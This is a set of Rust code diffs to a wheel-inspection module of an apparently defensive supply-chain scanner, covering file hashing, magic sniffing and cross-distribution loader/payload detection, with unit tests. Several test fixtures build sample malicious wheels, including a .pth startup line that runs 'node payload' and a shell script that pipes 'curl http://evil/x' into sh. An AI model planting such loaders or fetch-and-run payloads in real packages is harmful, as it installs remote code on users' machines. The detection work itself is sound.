-    // single wheel is its own distribution), so `known_malicious_indicator` is
-    // false here; the artifact-set path supplies cross-distribution corroboration.
+    // single wheel is its own distribution), so BOTH `known_malicious_indicator` and
+    // `unowned` are false here; the artifact-set path supplies cross-distribution
+    // corroboration.
     for handoff in &visitor.native {
-        let triage = triage_native(handoff, false);
+        let triage = triage_native(handoff, false, false);
         inspection.signals.extend(triage.signals);
         inspection.execution_edges.extend(triage.edges);
         if let Some(finding) = triage.finding {

--- a/crates/tirith-core/src/artifact/inspect.rs
+++ b/crates/tirith-core/src/artifact/inspect.rs
@@ -10,8 +10,9 @@
 //! # Single-artifact ([`inspect_artifact_file`])
 //!
 //! 1. Open the file no-follow within [`ARTIFACT_MAX_FILE_SIZE`] (a wheel ceiling,
-//!    larger than the 10 MiB text cap) and compute its whole-file SHA-256 from the
-//!    SAME handle (TOCTOU-safe).
+//!    larger than the 10 MiB text cap) ONCE and compute its whole-file SHA-256 from
+//!    a `try_clone` of that handle, then stream the archive from the SAME open file
+//!    description (a single open; no stat-then-reopen TOCTOU window).
 //! 2. Magic-sniff: `PK\x03\x04` (a ZIP local-file header) is a wheel/zip; the gzip
 //!    magic `\x1f\x8b` (a `.tar.gz` sdist) is `Unsupported` this milestone (the
 //!    wheel-only decision); anything else is `Unsupported`.
@@ -178,14 +179,38 @@ fn sniff_magic(bytes: &[u8]) -> ArtifactMagic {
     ArtifactMagic::Unknown
 }
 
+/// Read the leading magic bytes from an open `Read + Seek` handle and classify
+/// them, leaving the cursor rewound to 0 for the archive reader. A read I/O fault
+/// is [`ArtifactInspectError::Unreadable`], NOT a 0-byte prefix: folding an error
+/// into `n = 0` would sniff `Unknown` and mislabel the file as `Unsupported`, the
+/// same totality slip the seek-error path avoids. A SHORT (but successful) read is
+/// fine — `sniff_magic` simply sees fewer than 4 bytes.
+fn sniff_head<R: std::io::Read + std::io::Seek>(
+    reader: &mut R,
+) -> Result<ArtifactMagic, ArtifactInspectError> {
+    use std::io::SeekFrom;
+    let mut head = [0u8; 4];
+    let n = match reader.read(&mut head) {
+        Ok(n) => n,
+        Err(_) => return Err(ArtifactInspectError::Unreadable),
+    };
+    // Rewind for the archive reader regardless of how many bytes we got.
+    if reader.seek(SeekFrom::Start(0)).is_err() {
+        return Err(ArtifactInspectError::Unreadable);
+    }
+    Ok(sniff_magic(&head[..n]))
+}
+
 /// Inspect one artifact FILE: magic-sniff and, for a wheel, run the A4 reader plus
 /// the B5/B6/B7 analyzers. Returns an [`InspectedArtifact`] on success, or an
 /// [`ArtifactInspectError`] the caller maps to a coverage gap. NEVER panics and
 /// NEVER follows a symlinked final component.
 pub fn inspect_artifact_file(path: &Path) -> Result<InspectedArtifact, ArtifactInspectError> {
-    // Open no-follow with a wheel-appropriate ceiling. The opener fstat's the open
-    // fd, so an oversized or non-regular file is rejected before any read.
-    let file = match util::open_read_no_follow_capped(path, ARTIFACT_MAX_FILE_SIZE) {
+    use std::io::{Seek as _, SeekFrom};
+
+    // Open no-follow with a wheel-appropriate ceiling ONCE. The opener fstat's the
+    // open fd, so an oversized or non-regular file is rejected before any read.
+    let mut archive_file = match util::open_read_no_follow_capped(path, ARTIFACT_MAX_FILE_SIZE) {
         Ok(f) => f,
         Err(OpenRegularError::NotFound) | Err(OpenRegularError::NotRegularFile) => {
             return Err(ArtifactInspectError::Unreadable)
@@ -194,34 +219,31 @@ pub fn inspect_artifact_file(path: &Path) -> Result<InspectedArtifact, ArtifactI
         Err(OpenRegularError::Io(_)) => return Err(ArtifactInspectError::Unreadable),
     };
 
-    // Whole-file SHA-256 from the SAME handle (the artifact identity). We then
-    // re-open for the streaming archive read; computing the hash first means the
-    // identity is the bytes we just fstat'd. A read failure here is Unreadable.
-    let outer_sha256 = match util::sha256_from_handle(file, ARTIFACT_MAX_FILE_SIZE) {
+    // Whole-file SHA-256 over THIS open file description (the artifact identity).
+    // We never re-open the path: a `try_clone` (dup(2)) shares the SAME open file
+    // description and the SAME inode we just fstat'd, so the hashed bytes and the
+    // streamed bytes are the same file even if the path is swapped underneath us
+    // (closing the hash-fd vs stream-fd TOCTOU a stat-then-reopen would leave). We
+    // hash the clone (which `sha256_from_handle` consumes), then seek the original
+    // back to 0 and stream the archive from it.
+    let hash_handle = match archive_file.try_clone() {
+        Ok(f) => f,
+        Err(_) => return Err(ArtifactInspectError::Unreadable),
+    };
+    let outer_sha256 = match util::sha256_from_handle(hash_handle, ARTIFACT_MAX_FILE_SIZE) {
         Ok(HashOutcome::Digest(hex)) => hex,
         Ok(HashOutcome::BudgetExceeded) => return Err(ArtifactInspectError::TooLarge),
         Err(_) => return Err(ArtifactInspectError::Unreadable),
     };
 
-    // Re-open no-follow for the streaming archive read. The reader takes a
-    // Read + Seek handle and never buffers the whole file.
-    let mut archive_file = match util::open_read_no_follow_capped(path, ARTIFACT_MAX_FILE_SIZE) {
-        Ok(f) => f,
-        Err(_) => return Err(ArtifactInspectError::Unreadable),
-    };
-
-    // Magic sniff the leading bytes (bounded). We read a small prefix into a buffer,
-    // then seek back to 0 so the archive reader sees the whole file.
-    let magic = {
-        use std::io::{Read as _, Seek as _, SeekFrom};
-        let mut head = [0u8; 4];
-        let n = archive_file.read(&mut head).unwrap_or(0);
-        // Rewind for the archive reader regardless of how many bytes we got.
-        if archive_file.seek(SeekFrom::Start(0)).is_err() {
-            return Err(ArtifactInspectError::Unreadable);
-        }
-        sniff_magic(&head[..n])
-    };
+    // Magic sniff the leading bytes (bounded) from the SAME handle, then seek back
+    // to 0 so the archive reader sees the whole file. The hash above may have left
+    // the clone's cursor at EOF, but the clone shares this fd's file offset, so we
+    // seek to 0 here unconditionally before the sniff read.
+    if archive_file.seek(SeekFrom::Start(0)).is_err() {
+        return Err(ArtifactInspectError::Unreadable);
+    }
+    let magic = sniff_head(&mut archive_file)?;
 
     let outer_name = path
         .file_name()
@@ -465,7 +487,7 @@ pub fn inspect_artifact_set(paths: &[PathBuf]) -> ArtifactSetInspection {
     // the wheel (the same forward-slash module path a `.pth`/import would name).
     let mut index = OwnershipIndex::new();
     for m in &members {
-        let Some(dist) = member_distribution_identity(&m.inspected) else {
+        let Some(dist) = member_distribution_identity(m) else {
             continue;
         };
         for file in &m.inspected.inspection.files {
@@ -485,18 +507,23 @@ pub fn inspect_artifact_set(paths: &[PathBuf]) -> ArtifactSetInspection {
     }
 }
 
-/// The distribution identity for a set member's inspection (for the virtual
-/// ownership map). A wheel artifact identity becomes a distribution identity keyed
-/// by its filename (the stable per-artifact identity in a set).
-fn member_distribution_identity(inspected: &InspectedArtifact) -> Option<DistributionIdentity> {
-    match &inspected.inspection.subject {
+/// The distribution identity for a set member (for the virtual ownership map). A
+/// wheel artifact identity becomes a distribution identity keyed by its on-disk
+/// INPUT PATH, not the bare filename: two same-named wheels in different
+/// directories (`a/demo-1.0.whl` and `b/demo-1.0.whl`) must stay distinct
+/// identities so a cross-distribution split between them is not collapsed and
+/// missed. `same_distribution` compares name + this location, so the full path is
+/// what makes them distinguishable.
+fn member_distribution_identity(member: &ArtifactSetMember) -> Option<DistributionIdentity> {
+    match &member.inspected.inspection.subject {
         InspectionSubject::Artifact(a) => Some(DistributionIdentity {
             ecosystem: a.ecosystem,
             name: a.name.clone(),
             version: a.version.clone(),
-            // No on-disk dist-info dir for an un-installed wheel; use the filename as
-            // the stable identity location so two artifacts are distinguishable.
-            dist_info_path: SubjectLocation::from_path(PathBuf::from(&a.filename)),
+            // No on-disk dist-info dir for an un-installed wheel; use the artifact's
+            // actual input path as the stable identity location so two artifacts
+            // with the SAME filename in different directories stay distinct.
+            dist_info_path: SubjectLocation::from_path(member.path.clone()),
         }),
         _ => None,
     }
@@ -515,7 +542,7 @@ fn correlate_cross_distribution(
     let mut findings: Vec<Finding> = Vec::new();
 
     for loader in members {
-        let Some(loader_dist) = member_distribution_identity(&loader.inspected) else {
+        let Some(loader_dist) = member_distribution_identity(loader) else {
             continue;
         };
         // A loader is interesting only if it has a startup hook that EXECUTES and
@@ -578,10 +605,18 @@ fn correlate_cross_distribution(
             });
         }
 
-        // The cross-distribution split is the cross-runtime campaign mechanism; if
-        // the loader also launches a foreign runtime, it is the Critical
-        // cross-runtime case, else High suspicious. Either way it is attached to the
-        // loader and names the payload.
+        // The cross-distribution split is the cross-runtime campaign mechanism.
+        // When the loader ALSO launches a foreign runtime (Bun/Node/Deno), it is the
+        // real campaign signature: Critical, and a hard Block. When it does NOT, the
+        // signal is just "a sys.path-searching, executing startup hook co-inspected
+        // with some payload-shaped member owned by another distribution" — which a
+        // benign wheel shipping a `.so`/`.sh` alongside an unrelated `.pth` can
+        // trip, since the breadth here is intentionally rename-resistant (it does
+        // not require the loader to NAME the payload). So the non-cross-runtime case
+        // is Medium (a Warn), not a hard Block: full evidence is still attached (the
+        // loader and every payload member are named), but it does not block install
+        // without the stronger cross-runtime corroboration. Either way the finding is
+        // attached to the loader and names the payload.
         let loader_cross_runtime = loader
             .inspected
             .inspection
@@ -592,7 +627,7 @@ fn correlate_cross_distribution(
         let (rule_id, severity) = if loader_cross_runtime {
             (RuleId::PythonStartupHookCrossRuntime, Severity::Critical)
         } else {
-            (RuleId::PythonStartupHookSuspicious, Severity::High)
+            (RuleId::PythonStartupHookSuspicious, Severity::Medium)
         };
 
         findings.push(Finding {
@@ -655,7 +690,7 @@ fn resolve_cross_payloads(
         .unwrap_or_else(|| "loader startup hook".to_string());
 
     for payload in members {
-        let Some(payload_dist) = member_distribution_identity(&payload.inspected) else {
+        let Some(payload_dist) = member_distribution_identity(payload) else {
             continue;
         };
         // Skip the loader itself (a SAME-distribution member is not a
@@ -904,6 +939,279 @@ mod tests {
                 .iter()
                 .any(|f| f.rule_id == crate::verdict::RuleId::PythonStartupHookSuspicious),
             "an executable .pth must fire the suspicious startup finding: {findings:?}"
+        );
+    }
+
+    /// T1.4: `inspect_artifact_file` opens the file ONCE and hashes the SAME open
+    /// file description it streams the archive from. The recorded artifact sha256
+    /// must therefore equal an independent digest of the file's bytes AND the
+    /// archive must have streamed successfully (members present) from that same
+    /// handle — proving one open backed both the hash and the analysis, not two
+    /// reopens that a swap could split apart.
+    #[test]
+    fn inspect_artifact_file_uses_one_handle() {
+        use sha2::{Digest, Sha256};
+        let dir = tempfile::tempdir().unwrap();
+        let bytes = build_wheel(&[
+            ("demo/__init__.py", b"x = 1\n"),
+            (
+                "demo-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: demo\nVersion: 1.0\n\n",
+            ),
+            (
+                "demo-1.0.dist-info/RECORD",
+                b"demo-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let path = write_temp(&dir, "demo-1.0-py3-none-any.whl", &bytes);
+
+        // Independent reference digest of the exact file bytes (NEVER shelling out).
+        let expected: String = Sha256::digest(&bytes)
+            .iter()
+            .map(|b| format!("{b:02x}"))
+            .collect();
+
+        let inspected = inspect_artifact_file(&path).expect("inspect");
+        let recorded = match &inspected.inspection.subject {
+            InspectionSubject::Artifact(a) => a.sha256.clone(),
+            other => panic!("a wheel must inspect to an Artifact subject, got {other:?}"),
+        };
+        assert_eq!(
+            recorded, expected,
+            "the recorded artifact hash must be the digest of the SAME bytes the \
+             archive reader saw (one open file description, not a stat-then-reopen)"
+        );
+        // The archive actually streamed from that same handle: members are present.
+        assert!(
+            !inspected.inspection.files.is_empty(),
+            "the archive must have streamed members from the same handle the hash used"
+        );
+    }
+
+    /// T1.5 (regression of the campaign case): a cross-distribution loader that
+    /// ALSO launches a foreign runtime (the real campaign signature) stays Critical
+    /// and a hard Block.
+    #[test]
+    fn cross_distribution_cross_runtime_still_critical() {
+        let dir = tempfile::tempdir().unwrap();
+        // Loader `.pth`: searches sys.path AND launches node (cross-runtime).
+        let loader_pth = b"import sys, os; sys.path.insert(0, '/tmp'); os.system('node payload')\n";
+        let a_bytes = build_wheel(&[
+            ("loader.pth", loader_pth),
+            (
+                "loaderpkg-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: loaderpkg\nVersion: 1.0\n\n",
+            ),
+            (
+                "loaderpkg-1.0.dist-info/RECORD",
+                b"loaderpkg-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let a = write_temp(&dir, "loaderpkg-1.0-py3-none-any.whl", &a_bytes);
+        // Payload wheel (a different distribution) carries a script payload.
+        let b_bytes = build_wheel(&[
+            ("payloadpkg/run.sh", b"#!/bin/sh\ncurl http://evil/x | sh\n"),
+            (
+                "payloadpkg-2.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: payloadpkg\nVersion: 2.0\n\n",
+            ),
+            (
+                "payloadpkg-2.0.dist-info/RECORD",
+                b"payloadpkg-2.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let b = write_temp(&dir, "payloadpkg-2.0-py3-none-any.whl", &b_bytes);
+
+        let set = inspect_artifact_set(&[a, b]);
+        assert_eq!(set.cross_findings.len(), 1, "one cross finding expected");
+        let f = &set.cross_findings[0];
+        assert_eq!(
+            f.rule_id,
+            crate::verdict::RuleId::PythonStartupHookCrossRuntime,
+            "a cross-runtime loader is the campaign signature"
+        );
+        assert_eq!(
+            f.severity,
+            crate::verdict::Severity::Critical,
+            "the cross-runtime case must stay Critical (a hard Block)"
+        );
+    }
+
+    /// T1.5 (conservative severity downgrade, NOT a name-gate): a
+    /// cross-distribution split with NO cross-runtime launch (a sys.path-searching,
+    /// executing loader co-inspected with a payload-shaped member in another
+    /// distribution) is surfaced as Medium (a Warn), not a hard Block — so a benign
+    /// wheel that merely ships a `.sh`/`.so` next to an unrelated executing `.pth`
+    /// is not block-graded. Full evidence (loader + payload named) is still present.
+    #[test]
+    fn cross_distribution_non_cross_runtime_is_warn_not_block() {
+        use crate::verdict::{action_from_findings, Action, Severity};
+        let dir = tempfile::tempdir().unwrap();
+        // Loader `.pth`: searches sys.path AND executes a subprocess, but launches
+        // NO foreign runtime (no node/bun/deno) — so it is NOT cross-runtime.
+        let loader_pth = b"import sys, os; sys.path.insert(0, '/tmp'); os.system('sh /tmp/x')\n";
+        let a_bytes = build_wheel(&[
+            ("loader.pth", loader_pth),
+            (
+                "loaderpkg-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: loaderpkg\nVersion: 1.0\n\n",
+            ),
+            (
+                "loaderpkg-1.0.dist-info/RECORD",
+                b"loaderpkg-1.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let a = write_temp(&dir, "loaderpkg-1.0-py3-none-any.whl", &a_bytes);
+        // A benign payload wheel that merely ships a script member.
+        let b_bytes = build_wheel(&[
+            ("payloadpkg/helper.sh", b"#!/bin/sh\necho hi\n"),
+            (
+                "payloadpkg-2.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: payloadpkg\nVersion: 2.0\n\n",
+            ),
+            (
+                "payloadpkg-2.0.dist-info/RECORD",
+                b"payloadpkg-2.0.dist-info/RECORD,,\n",
+            ),
+        ]);
+        let b = write_temp(&dir, "payloadpkg-2.0-py3-none-any.whl", &b_bytes);
+
+        let set = inspect_artifact_set(&[a, b]);
+        assert_eq!(set.cross_findings.len(), 1, "one cross finding expected");
+        let f = &set.cross_findings[0];
+        assert_eq!(
+            f.severity,
+            Severity::Medium,
+            "a non-cross-runtime split is downgraded to Medium (a Warn), not High"
+        );
+        assert_eq!(
+            action_from_findings(std::slice::from_ref(f)),
+            Action::Warn,
+            "Medium derives to Warn, so the non-cross-runtime case is not a hard Block"
+        );
+        // Full evidence is still attached: loader and payload artifacts are named.
+        let evidence_text: String = f
+            .evidence
+            .iter()
+            .map(|e| serde_json::to_string(e).unwrap_or_default())
+            .collect();
+        assert!(
+            evidence_text.contains("loaderpkg-1.0-py3-none-any.whl")
+                && evidence_text.contains("payloadpkg-2.0-py3-none-any.whl"),
+            "the downgraded finding must still name the loader and payload: {evidence_text}"
+        );
+
+        // The load-bearing invariant that makes the downgrade safe: it is ADDITIVE,
+        // not a weakening. The loader wheel's OWN per-artifact correlation (an
+        // executing .pth line plus a subprocess danger capability) still produces a
+        // block-grade finding, so the FULL set verdict (all_findings = every member's
+        // findings plus the cross findings) is still a hard Block. Only the
+        // cross-distribution finding itself was downgraded to a Warn.
+        let all = set.all_findings(None);
+        assert!(
+            all.iter()
+                .any(|f| matches!(f.severity, Severity::High | Severity::Critical)),
+            "the loader's own per-artifact finding must still be block-grade: {:?}",
+            all.iter()
+                .map(|f| (f.rule_id, f.severity))
+                .collect::<Vec<_>>()
+        );
+        assert_eq!(
+            action_from_findings(&all),
+            Action::Block,
+            "the full set verdict still hard-Blocks via the loader's own finding, despite the cross-dist downgrade"
+        );
+    }
+
+    /// T3.24: two wheels with the SAME filename in DIFFERENT directories are
+    /// DISTINCT distributions, so a cross-distribution split between them is found
+    /// (it would be collapsed and MISSED if identity keyed on the bare filename).
+    #[test]
+    fn same_distribution_distinguishes_identical_names_in_different_dirs() {
+        let base = tempfile::tempdir().unwrap();
+        let dir_a = base.path().join("a");
+        let dir_b = base.path().join("b");
+        std::fs::create_dir_all(&dir_a).unwrap();
+        std::fs::create_dir_all(&dir_b).unwrap();
+
+        // Both wheels share the project NAME and FILENAME, differing only in dir.
+        // Wheel A is the cross-runtime loader; wheel B ships the script payload.
+        let loader_pth = b"import sys, os; sys.path.insert(0, '/tmp'); os.system('node payload')\n";
+        let a_bytes = build_wheel(&[
+            ("loader.pth", loader_pth),
+            (
+                "dup-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: dup\nVersion: 1.0\n\n",
+            ),
+            ("dup-1.0.dist-info/RECORD", b"dup-1.0.dist-info/RECORD,,\n"),
+        ]);
+        let b_bytes = build_wheel(&[
+            ("dup/run.sh", b"#!/bin/sh\ncurl http://evil/x | sh\n"),
+            (
+                "dup-1.0.dist-info/METADATA",
+                b"Metadata-Version: 2.1\nName: dup\nVersion: 1.0\n\n",
+            ),
+            ("dup-1.0.dist-info/RECORD", b"dup-1.0.dist-info/RECORD,,\n"),
+        ]);
+        let name = "dup-1.0-py3-none-any.whl";
+        let a = dir_a.join(name);
+        let b = dir_b.join(name);
+        std::fs::write(&a, &a_bytes).unwrap();
+        std::fs::write(&b, &b_bytes).unwrap();
+
+        // Direct identity check: same name, different on-disk path -> NOT the same
+        // distribution (the regression: bare-filename keying would call them equal).
+        let set = inspect_artifact_set(&[a, b]);
+        let id_a = member_distribution_identity(&set.members[0]).expect("identity a");
+        let id_b = member_distribution_identity(&set.members[1]).expect("identity b");
+        assert_eq!(
+            id_a.name, id_b.name,
+            "test premise: identical project names"
+        );
+        assert!(
+            !same_distribution(&id_a, &id_b),
+            "same filename in different dirs must NOT be the same distribution"
+        );
+        // And the split between them is therefore found, not collapsed.
+        assert_eq!(
+            set.cross_findings.len(),
+            1,
+            "a split between two identically named wheels in different dirs must be found: {:?}",
+            set.cross_findings
+        );
+    }
+
+    /// T3.25: a successful zero-byte read sniffs Unknown (-> Unsupported), but a
+    /// read I/O FAULT is `Unreadable`, not folded into `n = 0` and mislabeled
+    /// Unsupported. Tested at the seam with a reader that errors on `read`.
+    #[test]
+    fn sniff_magic_read_error_is_unreadable_not_unknown() {
+        use std::io::{self, Read, Seek, SeekFrom};
+
+        // A Read + Seek that always faults on read (seek is fine).
+        struct ErrReader;
+        impl Read for ErrReader {
+            fn read(&mut self, _buf: &mut [u8]) -> io::Result<usize> {
+                Err(io::Error::other("simulated read fault"))
+            }
+        }
+        impl Seek for ErrReader {
+            fn seek(&mut self, _pos: SeekFrom) -> io::Result<u64> {
+                Ok(0)
+            }
+        }
+        assert_eq!(
+            sniff_head(&mut ErrReader),
+            Err(ArtifactInspectError::Unreadable),
+            "a read fault must be Unreadable, not Unknown/Unsupported"
+        );
+
+        // CONTRAST: a successful EOF (0 bytes) is Unknown, NOT Unreadable.
+        let mut empty = std::io::Cursor::new(Vec::<u8>::new());
+        assert_eq!(
+            sniff_head(&mut empty),
+            Ok(ArtifactMagic::Unknown),
+            "a clean empty read is Unknown magic, not an Unreadable fault"
         );
     }
 }

--- a/crates/tirith-core/src/artifact/inspect.rs
+++ b/crates/tirith-core/src/artifact/inspect.rs
@@ -305,8 +305,21 @@ fn inspect_wheel<R: std::io::Read + std::io::Seek>(
                 fold_startup_member(&mut inspection, captured);
             }
             ArtifactFileKind::DistInfoMetadata => {
-                // The RECORD member (the only DistInfoMetadata member captured).
-                record_entries_bytes = Some(captured.bytes.clone());
+                // ONLY the exact RECORD member, not its detached signatures
+                // (`RECORD.jws` / `RECORD.p7s`), which `is_text_member_of_interest` also
+                // captures as DistInfoMetadata. A signature appearing AFTER RECORD in the
+                // central directory would otherwise overwrite the real RECORD bytes, fail
+                // CSV parsing (`record` becomes None), and fire a false RecordMissingFile
+                // on a legitimately signed wheel.
+                let is_record = captured
+                    .location
+                    .member_path
+                    .as_deref()
+                    .map(|m| m.rsplit('/').next().unwrap_or(m) == "RECORD")
+                    .unwrap_or(false);
+                if is_record {
+                    record_entries_bytes = Some(captured.bytes.clone());
+                }
             }
             _ => {}
         }

--- a/crates/tirith-core/src/artifact/inspect.rs
+++ b/crates/tirith-core/src/artifact/inspect.rs
@@ -1,0 +1,909 @@
+//! Artifact I/O: inspect a wheel/sdist FILE and an artifact SET (PR B8).
+//!
+//! A2 classifies a `.whl`/`.so`/... as an `ArtifactCandidate` during collection
+//! but, with no analyzer landed, turns it into an `Unsupported` coverage gap. B8
+//! closes that gap: this module is the I/O entry point that magic-sniffs an
+//! artifact candidate and, for a wheel, runs it through the A4 hardened reader and
+//! the B5/B6/B7 analyzers to produce a real [`ArtifactInspection`] (plus the
+//! per-member native-chain findings B7 decides during byte inspection).
+//!
+//! # Single-artifact ([`inspect_artifact_file`])
+//!
+//! 1. Open the file no-follow within [`ARTIFACT_MAX_FILE_SIZE`] (a wheel ceiling,
+//!    larger than the 10 MiB text cap) and compute its whole-file SHA-256 from the
+//!    SAME handle (TOCTOU-safe).
+//! 2. Magic-sniff: `PK\x03\x04` (a ZIP local-file header) is a wheel/zip; the gzip
+//!    magic `\x1f\x8b` (a `.tar.gz` sdist) is `Unsupported` this milestone (the
+//!    wheel-only decision); anything else is `Unsupported`.
+//! 3. For a wheel, stream it through [`crate::artifact::archive::read_wheel`] with a
+//!    capturing visitor that (a) collects native handoffs for B7 triage and (b)
+//!    captures the small startup-hook and RECORD member bytes for B5/B6, WITHOUT
+//!    re-opening the archive.
+//! 4. Run B6 ([`crate::artifact::pth::analyze_body`]) over each captured startup
+//!    member and B5 ([`crate::artifact::record::verify_wheel_record`]) over the
+//!    RECORD, folding the signals/edges onto the inspection.
+//!
+//! # Artifact-set ([`inspect_artifact_set`])
+//!
+//! A single wheel cannot show a cross-distribution loader/payload split (one
+//! wheel's `.pth` searches `sys.path` and runs ANOTHER distribution's bundled
+//! script). [`inspect_artifact_set`] is the two-pass model required for criterion
+//! 5: inspect each wheel independently, build a VIRTUAL installation ownership map
+//! across them, resolve cross-artifact references/edges, correlate, and attach each
+//! cross-distribution finding to the LOADER artifact while NAMING the payload.
+
+use std::path::{Path, PathBuf};
+
+use crate::artifact::archive::{
+    self, is_wheel_filename, ArchiveOutcome, MemberVisitor, NativeMemberHandoff,
+};
+use crate::artifact::native::triage_native;
+use crate::artifact::pth::{self, StartupHookKind};
+use crate::artifact::record::{verify_wheel_record, NormalizedInstalledPath, OwnershipIndex};
+use crate::artifact::wheel::parse_record;
+use crate::artifact::{
+    ArtifactFileKind, ArtifactInspection, ArtifactSignalKind, DistributionIdentity, EdgeConfidence,
+    ExecutionEdge, ExecutionTrigger, InspectionSubject,
+};
+use crate::location::SubjectLocation;
+use crate::scan::{CoverageGap, CoverageGapKind};
+use crate::util::{self, HashOutcome, OpenRegularError};
+use crate::verdict::Finding;
+
+/// Maximum artifact-file size opened for inspection: 512 MiB, the same ceiling the
+/// A4 reader uses for total uncompressed bytes. Larger than the 10 MiB text-scan
+/// cap (a wheel legitimately bundles compiled extensions), but bounded so a hostile
+/// multi-gigabyte "wheel" cannot drive an unbounded read or hash.
+pub const ARTIFACT_MAX_FILE_SIZE: u64 = 512 * 1024 * 1024;
+
+/// The bytes of a captured small text member (a startup hook or RECORD) plus its
+/// location and kind, collected by [`CapturingVisitor`] during the archive stream
+/// so B5/B6 can analyze them without re-opening the archive.
+struct CapturedMember {
+    location: SubjectLocation,
+    kind: ArtifactFileKind,
+    bytes: Vec<u8>,
+}
+
+/// The visitor B8 passes to [`read_wheel`]: it records native handoffs (for B7) and
+/// the small startup-hook / RECORD member bytes (for B5/B6). The reader has already
+/// enforced every budget before calling, so the captured bytes are bounded.
+#[derive(Default)]
+struct CapturingVisitor {
+    native: Vec<NativeMemberHandoff>,
+    text: Vec<CapturedMember>,
+}
+
+impl MemberVisitor for CapturingVisitor {
+    fn on_native_member(&mut self, handoff: NativeMemberHandoff) {
+        self.native.push(handoff);
+    }
+
+    fn on_text_member(&mut self, location: &SubjectLocation, kind: ArtifactFileKind, bytes: &[u8]) {
+        self.text.push(CapturedMember {
+            location: location.clone(),
+            kind,
+            bytes: bytes.to_vec(),
+        });
+    }
+}
+
+/// The result of inspecting one artifact file: the inspection (with B5/B6 signals
+/// and edges folded in), the per-member B7 native-chain findings, and whether the
+/// archive was structurally REJECTED (a hard violation, not a coverage limit).
+#[derive(Debug, Clone)]
+pub struct InspectedArtifact {
+    /// The populated inspection (signals/edges/files/coverage).
+    pub inspection: ArtifactInspection,
+    /// The per-member Critical native-chain findings B7 triage produced. Carried
+    /// separately because they are decided per member, not from the merged signal
+    /// set; folded into the verdict by
+    /// [`crate::artifact::evaluate_inspected_artifact`].
+    pub native_findings: Vec<Finding>,
+    /// `true` when the archive reader rejected the wheel for a HARD structural
+    /// violation (traversal, collision, encryption, CRC failure, conflicting
+    /// dist-info, identity mismatch). A rejected wheel is not-clean; its
+    /// `inspection` is a best-effort partial for evidence.
+    pub rejected: bool,
+    /// Human-readable descriptions of the structural violations when `rejected`.
+    pub violation_details: Vec<String>,
+}
+
+impl InspectedArtifact {
+    /// The artifact's on-disk filename (for messages), from its subject.
+    pub fn filename(&self) -> Option<&str> {
+        match &self.inspection.subject {
+            InspectionSubject::Artifact(a) => Some(&a.filename),
+            InspectionSubject::GenericArchive(g) => Some(&g.filename),
+            _ => None,
+        }
+    }
+}
+
+/// Why inspecting an artifact file did not produce a wheel inspection. The caller
+/// turns this into a coverage gap (so an artifact is never silently dropped).
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum ArtifactInspectError {
+    /// The file could not be opened or read (missing, symlinked final component,
+    /// non-regular, I/O error).
+    Unreadable,
+    /// The file exceeds [`ARTIFACT_MAX_FILE_SIZE`].
+    TooLarge,
+    /// The file is not a wheel/zip (an sdist `.tar.gz`, or an unknown magic). This
+    /// milestone is wheel-only, so these are `Unsupported`, never a false claim of
+    /// coverage.
+    Unsupported,
+}
+
+impl ArtifactInspectError {
+    /// The coverage-gap kind this error maps to.
+    pub fn gap_kind(self) -> CoverageGapKind {
+        match self {
+            ArtifactInspectError::Unreadable => CoverageGapKind::Unreadable,
+            // A too-large artifact is recorded as a hash-budget gap (it is too big to
+            // even hash within budget, so it is security-relevant regardless of ext).
+            ArtifactInspectError::TooLarge => CoverageGapKind::HashBudgetExceeded,
+            ArtifactInspectError::Unsupported => CoverageGapKind::Unsupported,
+        }
+    }
+}
+
+/// Magic-sniff result for an artifact candidate's leading bytes.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+enum ArtifactMagic {
+    /// `PK\x03\x04` / `PK\x05\x06` (empty) / `PK\x07\x08` — a ZIP, i.e. a wheel.
+    Zip,
+    /// `\x1f\x8b` — gzip, i.e. a `.tar.gz` sdist (Unsupported this milestone).
+    Gzip,
+    /// Anything else.
+    Unknown,
+}
+
+/// Sniff the leading bytes for the artifact magic. Safe and bounded (reads the
+/// first 4 bytes only). A wheel/zip starts `PK`; gzip starts `\x1f\x8b`.
+fn sniff_magic(bytes: &[u8]) -> ArtifactMagic {
+    if bytes.len() >= 4
+        && bytes[0] == b'P'
+        && bytes[1] == b'K'
+        && matches!(
+            (bytes[2], bytes[3]),
+            (0x03, 0x04) | (0x05, 0x06) | (0x07, 0x08)
+        )
+    {
+        return ArtifactMagic::Zip;
+    }
+    if bytes.len() >= 2 && bytes[0] == 0x1f && bytes[1] == 0x8b {
+        return ArtifactMagic::Gzip;
+    }
+    ArtifactMagic::Unknown
+}
+
+/// Inspect one artifact FILE: magic-sniff and, for a wheel, run the A4 reader plus
+/// the B5/B6/B7 analyzers. Returns an [`InspectedArtifact`] on success, or an
+/// [`ArtifactInspectError`] the caller maps to a coverage gap. NEVER panics and
+/// NEVER follows a symlinked final component.
+pub fn inspect_artifact_file(path: &Path) -> Result<InspectedArtifact, ArtifactInspectError> {
+    // Open no-follow with a wheel-appropriate ceiling. The opener fstat's the open
+    // fd, so an oversized or non-regular file is rejected before any read.
+    let file = match util::open_read_no_follow_capped(path, ARTIFACT_MAX_FILE_SIZE) {
+        Ok(f) => f,
+        Err(OpenRegularError::NotFound) | Err(OpenRegularError::NotRegularFile) => {
+            return Err(ArtifactInspectError::Unreadable)
+        }
+        Err(OpenRegularError::TooLarge) => return Err(ArtifactInspectError::TooLarge),
+        Err(OpenRegularError::Io(_)) => return Err(ArtifactInspectError::Unreadable),
+    };
+
+    // Whole-file SHA-256 from the SAME handle (the artifact identity). We then
+    // re-open for the streaming archive read; computing the hash first means the
+    // identity is the bytes we just fstat'd. A read failure here is Unreadable.
+    let outer_sha256 = match util::sha256_from_handle(file, ARTIFACT_MAX_FILE_SIZE) {
+        Ok(HashOutcome::Digest(hex)) => hex,
+        Ok(HashOutcome::BudgetExceeded) => return Err(ArtifactInspectError::TooLarge),
+        Err(_) => return Err(ArtifactInspectError::Unreadable),
+    };
